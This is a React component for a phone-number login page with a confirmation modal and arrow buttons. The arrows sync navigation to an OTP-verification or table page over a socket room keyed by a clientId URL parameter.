import React from "react";
import SubNav from "../../../Shared/SubNav";
import { useNavigate } from "react-router-dom";
import socket from "../../../context/socket";

export const LogIn = () => {
  const roomId = new URLSearchParams(window.location.search).get("clientId");
  const navigate = useNavigate();

  const handleNext = () => {
    const nextUrl = "/otp-verification?clientId=" + roomId; 
    socket.emit("navigate", { room: roomId, url: nextUrl });
    navigate(nextUrl);
  };

  const handleBack = () => {
    const prevUrl = "/table?clientId=" + roomId;
    socket.emit("navigate", { room: roomId, url: prevUrl });
    navigate(prevUrl);
  };
  return (
    <>
    

      <div className="container minht">
        <div className="row ">
          <div className="col-md-12 col-lg-6">
            <img
              src="assets/images/E-payment.svg"
              alt=""
              className="img-fluid float-lg-end"
            />
          </div>
          <div className="col-md-12 col-lg-6">
            <h2 className="mb-5 mt-5">Log in</h2>
            <div className="card">
              <div className="card-body py-5">
                <h5 className="card-title">
                  <form action="" className="ms-5 pb-3">
                    <label for="" className="fs-14 fw-normal">
                      Enter your phone number
                    </label>
                    <br />
                    <input
                      type="tel"
                      name="number"
                      id="number"
                      placeholder="+390 4738 28 29"
                      className="phone"
                    />
                  </form>
                </h5>
                <button
                  type="button"
                  className="lrgbutton text-white mt-5 ms-5"
                  data-bs-toggle="modal"
                  data-bs-target="#exampleModal"
                >
                  Log In
                </button>

                <div
                  className="modal fade"
                  id="exampleModal"
                  tabindex="-1"
                  aria-labelledby="exampleModalLabel"
                  aria-hidden="true"
                >
                  <div className="modal-dialog modal-dialog-centered">
                    <div className="modal-content">
                      <div className="modal-header border-0">
                        {/* <!-- <h1 className="modal-title fs-5" id="exampleModalLabel">Modal title</h1> --> */}
                        <button
                          type="button"
                          className="btn-close"
                          data-bs-dismiss="modal"
                          aria-label="Close"
                        ></button>
                      </div>
                      <div className="modal-body text-center">
                        {/* <!-- <img src="assets/images/wait-a-moment.svg" alt=""> --> */}
                        <i className="fa-solid fa-thumbs-up text-success fs-1"></i>
                        <h4 className="fw-normal clr-wait-moment mt-4 text-success">
                          You are succesfully login
                        </h4>
                      </div>
                      <div className="modal-footer border-0">
                        {/* <!-- <button type="button" className="btn btn-secondary" data-bs-dismiss="modal">Close</button>
                                                            <button type="button" className="btn btn-primary">Save changes</button> --> */}
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>

      <div className="row mt-md-3 mt-4">
        <div className="col">
          <div className="container">
            <div className="row my-4">
              <div className="col text-end">
                <a href="javascript:void(0);" onClick={handleBack}>
                  <img
                    className="arrow_next1"
                    src="assets/images/left-arrowpng.png"
                    alt=""
                  />
                </a>
                <a href="javascript:void(0);" className="ms-1" onClick={handleNext}>
                  <img
                    className="arrow_next"
                    src="assets/images/right-arrow.svg"
                    alt=""
                  />
                </a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </>
  );
};
